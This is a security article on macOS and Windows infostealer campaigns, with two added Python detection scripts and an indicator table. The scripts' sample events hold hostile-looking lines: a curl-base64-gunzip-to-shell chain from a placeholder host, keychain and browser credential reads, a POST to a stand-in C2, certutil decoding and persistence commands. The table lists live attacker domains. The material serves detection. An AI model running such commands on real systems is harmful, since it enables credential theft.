There has been a sharp rise in campaigns targeting macOS users, while attackers also ramp up Python‑based stealers and abuse trusted platforms such as WhatsApp and popular PDF utilities.
These attacks focus on harvesting credentials, browser data, cloud keys, and cryptocurrency wallets, then quietly exfiltrating them to attacker‑controlled infrastructure.
On macOS, threat actors increasingly rely on social engineering and native tooling instead of obvious malware bundles.
Users are lured through malicious ads and SEO‑poisoned search results into downloading fake apps or following “ClickFix”‑style instructions that ask them to paste commands into Terminal.
This activity fuels campaigns for stealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS), which arrive via trojanized DMG installers, copy‑paste terminal chains, and bogus AI tool installers.
Once executed, these tools abuse fileless execution, AppleScript (osascript), JXA, and built‑in utilities like curl, Base64 decoding, and gunzip to grab browser passwords, keychain entries, crypto wallet files, and developer secrets before deleting evidence to evade detection.
Python Becomes a Weapon of Choice
The impact of these macOS campaigns is significant. Stolen browser and keychain credentials enable account takeovers across email, banking, social media, and enterprise SaaS platforms.
Cryptocurrency wallet data can be drained almost immediately, while compromised developer keys open the door to source‑code theft, cloud infrastructure compromise, and downstream supply chain attacks.
Because these operations blend in with normal macOS processes and user workflows, traditional signature‑based defenses are often insufficient.
In parallel, Python‑based infostealers are becoming a preferred tool for cybercriminals due to their flexibility and low barrier to entry.
Microsoft Defender Experts has documented multiple phishing‑driven campaigns that deliver Python stealers capable of harvesting credentials, session cookies, authentication tokens, credit card data, and crypto wallet information.
PXA Stealer, a prominent Python infostealer linked to Vietnamese‑speaking actors, has been used against government and education organizations.
New Tactics Target Apple Ecosystem
Campaigns observed in late 2025 relied on phishing emails for initial access, registry Run keys and scheduled tasks for persistence, and Telegram channels for command‑and‑control and exfiltration.
To stay hidden, operators used obfuscated Python scripts, DLL sideloading, renamed Python interpreters masquerading as svchost.exe, and signed living‑off‑the‑land binaries.
Attackers are also abusing the trust and reach of widely used platforms. In one WhatsApp‑based campaign, an obfuscated VBScript dropped a batch file that launched PowerShell to pull additional payloads.
A Python script then used WPPConnect to send automated messages and malicious attachments from compromised WhatsApp accounts, while a separate MSI installer deployed Eternidade Stealer, which monitors active windows for banking, payment, and crypto services to capture sensitive data.
Another campaign impersonated a PDF editor, Crystal PDF, using malvertising to trick users into downloading CrystalPDF.exe.
Once launched, the fake tool established persistence via scheduled tasks and hijacked Firefox and Chrome profiles to lift cookies, session data, and credential caches from AppData.
To counter these evolving threats, organizations should combine user awareness with strong technical controls.
Training should highlight malvertising chains, fake installers, and ClickFix‑style prompts on macOS, and discourage installing unsigned DMGs or unofficial “terminal fix” tools.
Security teams should monitor for suspicious Terminal and shell activity, fileless execution patterns, abnormal access to keychains and browser stores, and transient data staging in temporary directories followed by outbound POST requests to unknown domains.
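As an added example (not from the article, and not Microsoft's own detection logic), the following Python script applies the macOS hunting guidance above to a constructed set of process, file and network events: it groups events by Terminal lineage and scores the fileless curl | base64 | gunzip | sh chain, osascript/JXA use, reads of keychain and browser credential stores, a write under /tmp followed by an outbound POST to a host outside an allowlist, and removal of the staging directory afterwards. The event schema, the weights, the threshold and the allowlist are assumptions chosen for the example, not any product's telemetry format.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real data). Field names are assumptions:
# ts, pid, ppid, proc, plus one of cmdline / file+op / net{method, host}.
SAMPLE_EVENTS = [
    # lineage 1: a ClickFix-style paste into Terminal (constructed)
    {"ts": 100, "pid": 501, "ppid": 1, "proc": "Terminal", "cmdline": "Terminal"},
    {"ts": 101, "pid": 510, "ppid": 501, "proc": "bash",
     "cmdline": "bash -c 'curl -fsSL https://dl.example.invalid/x | base64 -d | gunzip | sh'"},
    {"ts": 102, "pid": 511, "ppid": 510, "proc": "osascript",
     "cmdline": "osascript -l JavaScript -e '<jxa placeholder>'"},
    {"ts": 103, "pid": 510, "ppid": 501, "proc": "bash", "op": "read",
     "file": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"ts": 104, "pid": 510, "ppid": 501, "proc": "bash", "op": "read",
     "file": "/Users/alice/Library/Application Support/Google/Chrome/Default/Login Data"},
    {"ts": 105, "pid": 510, "ppid": 501, "proc": "bash", "op": "write", "file": "/tmp/.st/out.zip"},
    {"ts": 106, "pid": 512, "ppid": 510, "proc": "curl", "net": {"method": "POST", "host": "c2.example.invalid"}},
    {"ts": 107, "pid": 510, "ppid": 501, "proc": "bash", "cmdline": "rm -rf /tmp/.st"},
    # lineage 2: ordinary developer activity (constructed)
    {"ts": 200, "pid": 601, "ppid": 1, "proc": "Terminal", "cmdline": "Terminal"},
    {"ts": 201, "pid": 610, "ppid": 601, "proc": "zsh", "cmdline": "zsh"},
    {"ts": 202, "pid": 611, "ppid": 610, "proc": "curl", "net": {"method": "GET", "host": "api.github.com"}},
    {"ts": 203, "pid": 612, "ppid": 610, "proc": "osascript",
     "cmdline": "osascript -e 'display notification \"build done\"'"},
    {"ts": 204, "pid": 610, "ppid": 601, "proc": "zsh", "op": "write", "file": "/tmp/build.log"},
]

ALLOWED_HOSTS = {"api.github.com", "pypi.org"}  # constructed allowlist of expected destinations

# curl output piped through a base64 decode and gunzip into a shell: the fileless chain
FILELESS_CHAIN = re.compile(r"curl\b.*\|.*base64\s+(-d|--decode|-D)\b.*\|.*(gunzip|gzip\s+-d).*\|\s*(ba|z)?sh\b")
# keychain, Chromium/Firefox credential stores and developer secrets (wallet paths could be added)
SECRET_STORES = re.compile(r"/Library/Keychains/|/(Login Data|Cookies|Web Data|logins\.json|key4\.db)$|/\.(aws|ssh)/")
STAGING_DIR = re.compile(r"^/(private/)?tmp/|^/var/folders/")

WEIGHTS = {"fileless_chain": 4, "script_engine": 1, "secret_store_access": 3,
           "staging_then_post": 4, "evidence_deletion": 2}  # assumed weights
THRESHOLD = 6  # assumed: a lone osascript or a lone /tmp write never reaches it


def root_of(pid, parents):
    """Walk ppid links up to the lineage root (the process whose parent is pid 1)."""
    seen = set()
    while parents.get(pid, 1) != 1 and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid


def analyze(events):
    """Score every process lineage; returns {root_pid: {signals, score, suspicious}}."""
    parents = {e["pid"]: e.get("ppid", 1) for e in events}
    by_root = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_root[root_of(e["pid"], parents)].append(e)

    report = {}
    for root, evs in by_root.items():
        signals, staged_at, staged_paths = set(), None, []
        for e in evs:
            cmd, path, net = e.get("cmdline", ""), e.get("file"), e.get("net")
            if FILELESS_CHAIN.search(cmd):
                signals.add("fileless_chain")
            if e["proc"] == "osascript":  # covers both AppleScript and JXA (-l JavaScript)
                signals.add("script_engine")
            if path and SECRET_STORES.search(path):
                signals.add("secret_store_access")
            if path and e.get("op") == "write" and STAGING_DIR.search(path):
                staged_at = e["ts"] if staged_at is None else staged_at
                staged_paths.append(path)
            # outbound POST to a non-allowlisted host only counts once data has been staged
            if (net and net["method"] == "POST" and net["host"] not in ALLOWED_HOSTS
                    and staged_at is not None and e["ts"] > staged_at):
                signals.add("staging_then_post")
            # rm of the directory that held the staged files: cleanup after exfiltration
            if cmd.startswith("rm ") and any(p.startswith(cmd.split()[-1]) for p in staged_paths):
                signals.add("evidence_deletion")
        score = sum(WEIGHTS[s] for s in signals)
        report[root] = {"signals": sorted(signals), "score": score, "suspicious": score >= THRESHOLD}
    return report


if __name__ == "__main__":
    for root, r in analyze(SAMPLE_EVENTS).items():
        print(root, r)
```

The sequencing matters more than any single rule: a /tmp write on its own (lineage 2's build log) or a single osascript call scores far below the threshold, while the staging-then-POST pairing and the decode-to-shell chain together push lineage 1 well past it, which mirrors the advice to look for combinations of transient staging and unknown outbound POSTs rather than individual built-in tools.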
On Windows, defenders should look for obfuscated scripts, renamed interpreters, DLL sideloading, and unusual AutoIt or certutil usage.
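As an added example covering the Windows tradecraft described in this article (renamed Python interpreters posing as svchost.exe, certutil and AutoIt abuse, DLL sideloading, Run-key and scheduled-task persistence, and browser profile reads from AppData), the following Python script classifies a constructed set of Sysmon-style events. It is not Microsoft's or Sysmon's own logic: the field names Image, OriginalFileName, CommandLine, ImageLoaded and Signed follow Sysmon conventions, but the file_access event type is an assumed EDR-style record (Sysmon does not log file reads), and the sideloading rule is a heuristic chosen for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style events (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "Image": r"C:\Users\bob\AppData\Roaming\Sys\svchost.exe",
     "OriginalFileName": "python.exe", "CommandLine": r"svchost.exe -c C:\Users\bob\AppData\Roaming\Sys\m.py"},
    {"type": "process", "Image": r"C:\Windows\System32\svchost.exe",  # the real service host
     "OriginalFileName": "svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"type": "process", "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -decode C:\Users\bob\AppData\Local\Temp\p.txt C:\Users\bob\AppData\Local\Temp\p.exe"},
    {"type": "process", "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -verify C:\certs\corp.cer"},  # legitimate certificate work
    {"type": "process", "Image": r"C:\Windows\System32\schtasks.exe", "OriginalFileName": "schtasks.exe",
     "CommandLine": r'schtasks /create /sc onlogon /tn Updater /tr "C:\Users\bob\AppData\Roaming\CrystalPDF\CrystalPDF.exe"'},
    {"type": "process", "Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Sys /t REG_SZ /d "C:\Users\bob\AppData\Roaming\Sys\svchost.exe"'},
    {"type": "process", "Image": r"C:\Users\bob\AppData\Local\Temp\AutoIt3.exe", "OriginalFileName": "AutoIt3.exe",
     "CommandLine": r"AutoIt3.exe C:\Users\bob\AppData\Local\Temp\run.a3x"},
    {"type": "imageload", "Image": r"C:\Users\bob\AppData\Roaming\Vendor\signed_app.exe", "Signed": True,
     "ImageLoaded": r"C:\Users\bob\AppData\Roaming\Vendor\version.dll", "LoadedSigned": False},
    {"type": "imageload", "Image": r"C:\Program Files\Vendor\app.exe", "Signed": True,
     "ImageLoaded": r"C:\Windows\System32\version.dll", "LoadedSigned": True},  # normal system DLL load
    {"type": "file_access", "Image": r"C:\Users\bob\AppData\Roaming\CrystalPDF\CrystalPDF.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"type": "file_access", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
]

INTERPRETERS = {"python.exe", "pythonw.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}  # processes expected to touch their own stores
# directories a standard user can write to; used both as a path prefix and as a command-line substring
USER_WRITABLE = re.compile(r"[a-z]:\\(users\\[^\\]+\\appdata\\|users\\public\\|programdata\\|windows\\temp\\)", re.I)
BROWSER_STORES = re.compile(r"\\appdata\\.*\\(login data|cookies|web data|cookies\.sqlite|logins\.json|key4\.db)$", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\b", re.I)


def base(path):
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def classify(e):
    """Return the detection tags that apply to one event (empty list if none)."""
    tags = []
    if e["type"] == "process":
        img, orig, cmd = base(e["Image"]), e.get("OriginalFileName", "").lower(), e.get("CommandLine", "")
        # PE version resource still says python.exe although the file on disk was renamed
        if orig in INTERPRETERS and img != orig:
            tags.append("renamed_interpreter")
        # svchost.exe legitimately lives only in System32
        if img == "svchost.exe" and str(PureWindowsPath(e["Image"]).parent).lower() != r"c:\windows\system32":
            tags.append("svchost_masquerade")
        if img == "certutil.exe" and re.search(r"\s-(decode|encode|urlcache)\b", cmd, re.I):
            tags.append("certutil_abuse")
        if img == "autoit3.exe" or orig == "autoit3.exe":
            tags.append("autoit_script_host")
        # persistence pointing at a user-writable location
        if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and USER_WRITABLE.search(cmd):
            tags.append("schtask_persistence")
        if img == "reg.exe" and re.search(r"\badd\b", cmd, re.I) and RUN_KEY.search(cmd):
            tags.append("runkey_persistence")
    elif e["type"] == "imageload":
        # heuristic: a signed executable in a user-writable directory loading an unsigned DLL from there
        if (e["Signed"] and not e["LoadedSigned"]
                and USER_WRITABLE.match(e["Image"]) and USER_WRITABLE.match(e["ImageLoaded"])):
            tags.append("possible_dll_sideload")
    elif e["type"] == "file_access":
        if BROWSER_STORES.search(e["TargetFilename"]) and base(e["Image"]) not in BROWSERS:
            tags.append("browser_store_access")
    return tags


def scan(events):
    """Map event index -> tags for every event that matched at least one rule."""
    return {i: tags for i, e in enumerate(events) if (tags := classify(e))}


if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["type"], tags)
```

The renamed-interpreter rule relies on OriginalFileName from the PE version resource rather than the on-disk name, which is exactly why a python.exe renamed to svchost.exe still stands out; the same event also trips the path rule, since the genuine service host never runs from AppData. The sideloading and browser-store rules are heuristics and will need tuning against an environment's own software inventory before they are used for alerting.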
Microsoft Defender XDR helps detect and block these behaviors across macOS and Windows endpoints, email, identities, and cloud apps.
Enabling cloud‑delivered protection, EDR in block mode, web and network protection, attack surface reduction rules, and tamper protection significantly improves resilience against infostealers.
With coordinated telemetry, built‑in hunting queries, and assistance from Microsoft Security Copilot, organizations can more effectively identify infostealer activity, contain incidents early, and reduce the risk of credential theft, financial loss, and follow‑on ransomware or supply chain attacks.
Indicators of compromise
| Indicator | Type | Description |
|---|---|---|
| 3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a | SHA-256 | DigitStealer payload |
| 42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417 | SHA-256 | AMOS payload |
| 2c885d1709e2ebfcaa81e998d199b29e982a7559b9d72e5db0e70bf31b183a5f | SHA-256 | WhatsApp campaign |
| 598da788600747cf3fa1f25cb4fa1e029eca1442316709c137690e645a0872bb | SHA-256 | Crystal PDF payload |
| dynamiclake[.]org | Domain | DigitStealer delivery |
| barbermoo[.]coupons | Domain | MacSync C2 |
| alli-ai[.]pro | Domain | AMOS redirect |
| bagumedios[.]cloud | Domain | PXA C2 |
